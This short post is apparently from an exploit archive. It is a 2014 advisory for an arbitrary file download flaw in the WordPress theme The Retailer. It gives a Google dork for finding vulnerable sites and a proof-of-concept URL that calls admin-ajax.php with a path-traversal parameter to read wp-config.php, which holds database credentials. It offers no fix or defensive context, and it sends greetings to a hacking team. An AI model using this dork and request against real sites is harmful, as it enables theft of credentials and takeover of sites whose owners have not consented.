facebook facebook twitter rss

WordPress The Retailer theme Arbitrary File Download Vulnerability

Author: JK , Published: 15-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress The Retailer theme Arbitrary File Download Vulnerability
# Author : JK
# Vendor Homepage :
# http://themeforest.net/item/the-retailer-retina-responsive-woocommerce-theme/4287447


# Risk : High
# Class: Remote
# Google Dork: inurl:/wp-content/themes/theretailer/
# Date: 05/09/2014
# Greetz to : All Egy-Shell Team Members
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++poc :
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Like us on Facebook :